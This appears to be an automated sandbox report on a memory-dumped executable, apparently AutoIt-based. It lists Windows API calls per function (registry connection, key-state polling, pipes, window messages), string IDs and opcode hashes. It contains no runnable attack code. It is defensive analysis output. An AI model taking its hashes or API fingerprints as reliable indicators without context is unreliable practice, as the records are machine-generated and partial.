                                                    • Instruction Fuzzy Hash: CEE07576104609BBDB811FE5EC0C9AABF79FF49722B904621F22591474CF32A469EB50
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F68CFD
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F68E0C
                                                    • VariantClear.OLEAUT32(?), ref: 00F68F84
                                                      • Part of subcall function 00F57B1D: VariantInit.OLEAUT32(00000000), ref: 00F57B5D
                                                      • Part of subcall function 00F57B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00F57B66
                                                      • Part of subcall function 00F57B1D: VariantClear.OLEAUT32(00000000), ref: 00F57B72
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: d3069c18800a7b67b843c6be1a869ddb3b0fae6acb2ebbfb1c626d282f6c38ff
                                                    • Instruction ID: 686191d887c1508254d4c6b190fa9f21541bc0f2bafe683ae3ec2a8aeceb3370
                                                    • Opcode Fuzzy Hash: d3069c18800a7b67b843c6be1a869ddb3b0fae6acb2ebbfb1c626d282f6c38ff
                                                    • Instruction Fuzzy Hash: D8919F716083019FC710DF24C88096BBBF5EF99354F048A6EF9899B3A1DB31E946DB52
                                                    APIs
                                                      • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
                                                    • _memset.LIBCMT ref: 00F5332E
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F5335D
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F53410
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F5343E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 6290d2d504b1b2be976924374151b2bd355a4b0a9d5a322899ce668fb34a4d73
                                                    • Instruction ID: cf5f52c2fb07fa3d7db3ec0a5b26cd5d0f1aad1a89b08cc5e6d2aa32bcdd00a5
                                                    • Opcode Fuzzy Hash: 6290d2d504b1b2be976924374151b2bd355a4b0a9d5a322899ce668fb34a4d73
                                                    • Instruction Fuzzy Hash: BE51C031A083009BD716DA2CC84566BB7E8AF453A2F044A2DFE95931E1DB74DA48BB52
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F52F67
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F52F83
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F52FC9
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FB7890,00000000), ref: 00F53012
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 5b2b3a9067d97955ac94a01e69f12fa0099e6ce6e0f533ca4fa67b0f66429026
                                                    • Instruction ID: 8cf57637fe8cd09b69d22c7d085668e7f6d5d9b56cbd7811fdd993987ac5e365
                                                    • Opcode Fuzzy Hash: 5b2b3a9067d97955ac94a01e69f12fa0099e6ce6e0f533ca4fa67b0f66429026
                                                    • Instruction Fuzzy Hash: 144115316043419FD720DF28CC84B5ABBE4AF85365F04461DFE65972D1DB70EA09EB62
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F49ACC
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F49ADF
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F49B0F
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    • Opcode ID: 290bfcb28db9939786e35a39d075d01f4ef1f35990c83df3604c8b870e507387
                                                    • Instruction ID: e8b4994039b3c031c9b5d223d4a0466c053a7ed30650dbb24603daa3af82b5d2
                                                    • Opcode Fuzzy Hash: 290bfcb28db9939786e35a39d075d01f4ef1f35990c83df3604c8b870e507387
                                                    • Instruction Fuzzy Hash: 6521E471E04104BEDB24ABA0DC46DFFBBA8EF85360F104119F825972D1DB784A49B620
                                                    APIs
                                                      • Part of subcall function 00EF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                      • Part of subcall function 00EF2111: GetStockObject.GDI32(00000011), ref: 00EF2163
                                                      • Part of subcall function 00EF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F76A86
                                                    • LoadLibraryW.KERNEL32(?), ref: 00F76A8D
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F76AA2
                                                    • DestroyWindow.USER32(?), ref: 00F76AAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: f6294fa45708ef6ee68f48f39c236318475bca00a0838ef5171beb9a65e15881
                                                    • Instruction ID: 06ab863f0bd8dda7397374e6a725ee6a8205d9a848350cd10c8b1afbc8e06943
                                                    • Opcode Fuzzy Hash: f6294fa45708ef6ee68f48f39c236318475bca00a0838ef5171beb9a65e15881
                                                    • Instruction Fuzzy Hash: E8218E71600609AFFF108E649C80EBB77ADEB59334F50C61AFA58E2190D739DC51BB61
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F57377
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F573AA
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F573BC
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F573F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: a205eca9bb47e21a2c6fa61ae5958aa5e802cc89718851e8659e8e796ff0b7ab
                                                    • Instruction ID: 4324939fd0e728abcfcf574160b550b582eeb4509c00393bad0e85628496074c
                                                    • Opcode Fuzzy Hash: a205eca9bb47e21a2c6fa61ae5958aa5e802cc89718851e8659e8e796ff0b7ab
                                                    • Instruction Fuzzy Hash: 6F21AC715083069FDB10AF65EC05A997BE4AF45731F204A19FDA0D72D0D771D858FB50
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F57444
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F57476
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F57487
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F574C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 4b925e7ece16ae0bb2a5f7f8c08a9bb4cc8a0e7396b1ee63e09dc7275d551d93
                                                    • Instruction ID: 13755e82be8d208ce738020a69132ed32f6e38e6e921eb8e6d86675dec63f821
                                                    • Opcode Fuzzy Hash: 4b925e7ece16ae0bb2a5f7f8c08a9bb4cc8a0e7396b1ee63e09dc7275d551d93
                                                    • Instruction Fuzzy Hash: B921A771908305DBDB20EF69AC48E997BA8AF55731F200B19FEB0D72D0DB709858EB51
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F5B297
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F5B2EB
                                                    • __swprintf.LIBCMT ref: 00F5B304
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F80980), ref: 00F5B342
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 2b68e943634286e3acd5c11f1c4ce238818d29839f66d1bb9baadb5c2db74ac4
                                                    • Instruction ID: 504fb625abf50447fb9d0d658ba53fddfc1ad71f5e1d91343fa67f74563854a2
                                                    • Opcode Fuzzy Hash: 2b68e943634286e3acd5c11f1c4ce238818d29839f66d1bb9baadb5c2db74ac4
                                                    • Instruction Fuzzy Hash: 60218371A0010CAFCB10EF64CC85DEEBBB8EF89714B104069F909E7252DB71EA45DB61
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                      • Part of subcall function 00F4AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F4AA6F
                                                      • Part of subcall function 00F4AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4AA82
                                                      • Part of subcall function 00F4AA52: GetCurrentThreadId.KERNEL32 ref: 00F4AA89
                                                      • Part of subcall function 00F4AA52: AttachThreadInput.USER32(00000000), ref: 00F4AA90
                                                    • GetFocus.USER32 ref: 00F4AC2A
                                                      • Part of subcall function 00F4AA9B: GetParent.USER32(?), ref: 00F4AAA9
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F4AC73
                                                    • EnumChildWindows.USER32(?,00F4ACEB), ref: 00F4AC9B
                                                    • __swprintf.LIBCMT ref: 00F4ACB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 7a18ad13a60ac6fc2c4b395c290bbdc8e08472d2bc25a1539084802520b0e487
                                                    • Instruction ID: d0566e66a267d8e49d372fe72a1dd69f8c35d7dda72a0727a80848b1233df673
                                                    • Opcode Fuzzy Hash: 7a18ad13a60ac6fc2c4b395c290bbdc8e08472d2bc25a1539084802520b0e487
                                                    • Instruction Fuzzy Hash: 4411B775640205ABDF51BFA0CD85FEA3B6CAF45710F004075FE18AA182DA789949FB71
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F52318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: 8c7b0a55209408759533dd234b71281c2024bc2892b68287bc8b1364107669c6
                                                    • Instruction ID: 063be5cfa0d454f0a9ae36bad24eb54d3ba0676e91f8b543c18eef6aadc3f4fe
                                                    • Opcode Fuzzy Hash: 8c7b0a55209408759533dd234b71281c2024bc2892b68287bc8b1364107669c6
                                                    • Instruction Fuzzy Hash: CE118B70900119DFCF40EFA4D8504EEB3B4FF16304B508168E810A72A2EF3A6E4AEF40
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F6F2F0
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F6F320
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F6F453
                                                    • CloseHandle.KERNEL32(?), ref: 00F6F4D4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 634d2e65a34a84fed75b9e73bf07ad3c22216d42a4c62c924d08a861de60460b
                                                    • Instruction ID: a67f96b0a0b15b3a4b650c4be7a16830b8d614e0981cf1ff7f849de13b606c83
                                                    • Opcode Fuzzy Hash: 634d2e65a34a84fed75b9e73bf07ad3c22216d42a4c62c924d08a861de60460b
                                                    • Instruction Fuzzy Hash: 7E8161B16047049FD720EF24D846F3BB7E5AF44720F14892DFA59AB2D2DB71AC448B51
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7075D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F7079C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F707E3
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F7080F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F7081C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 290a788f74ea45254b15a9eb32d5c78960543b1b4f097aedfa10f0dc185c0aeb
                                                    • Instruction ID: 58390ad9c5c43372f99e967858a91dbb66fc122835d55b02dd20e43e7f23c752
                                                    • Opcode Fuzzy Hash: 290a788f74ea45254b15a9eb32d5c78960543b1b4f097aedfa10f0dc185c0aeb
                                                    • Instruction Fuzzy Hash: 50514A71208204EFD714EF64CC81F6AB7E9BF84314F00891EF59997292DB34E905EB52
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F5EC62
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F5EC8B
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F5ECCA
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F5ECEF
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F5ECF7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: a7c31d84abae30d36a3ad0fea5506d6fd9318666c5bf74f24917d4b26a566fff
                                                    • Instruction ID: 0693c7b421fdfe80cb8aac48c534b79e356eba922253657664f64f4a8dfff423
                                                    • Opcode Fuzzy Hash: a7c31d84abae30d36a3ad0fea5506d6fd9318666c5bf74f24917d4b26a566fff
                                                    • Instruction Fuzzy Hash: 79513975A00109DFCB05EF64C985EAEBBF5EF08310B148099E909AB3A2CB35ED55EB50
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9556a3349fa924f05f3a8abffb26b5fa00fed94a613bd13c545f70d43738256e
                                                    • Instruction ID: 8bf837f92dbcd4278bbd462bfd47ae77f6f72d0c7bc363901aeddf5c4bfe9a8f
                                                    • Opcode Fuzzy Hash: 9556a3349fa924f05f3a8abffb26b5fa00fed94a613bd13c545f70d43738256e
                                                    • Instruction Fuzzy Hash: 4A41D536D00108AFD718DB28CC84FBDB7B4EB89320F568166E91DA72D1D6709D52FA52
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00EF2727
                                                    • ScreenToClient.USER32(00FB77B0,?), ref: 00EF2744
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00EF2769
                                                    • GetAsyncKeyState.USER32(00000002), ref: 00EF2777
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: ea01e1eec489c871575b2c0685ff59752a5b32e1163aebdd498cbdc9ae425386
                                                    • Instruction ID: 1099f6e04d63ace9fce2aa584d53bc1bbab153690488ec11a472785bc295f35b
                                                    • Opcode Fuzzy Hash: ea01e1eec489c871575b2c0685ff59752a5b32e1163aebdd498cbdc9ae425386
                                                    • Instruction Fuzzy Hash: 17416D35904119FBDF199F68C844AFDBB74BB05364F20831AF928A62D0CB31AD54EB91
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F495E8
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00F49692
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F4969A
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00F496A8
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F496B0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 56234c4886751fd7ed601297f9dfce88abc85b9e3f98091dd53aa13d7258017e
                                                    • Instruction ID: 2bb8143ab8e762d414f432bb7a47661e18264748bf06bba54c741c03ea18b3cc
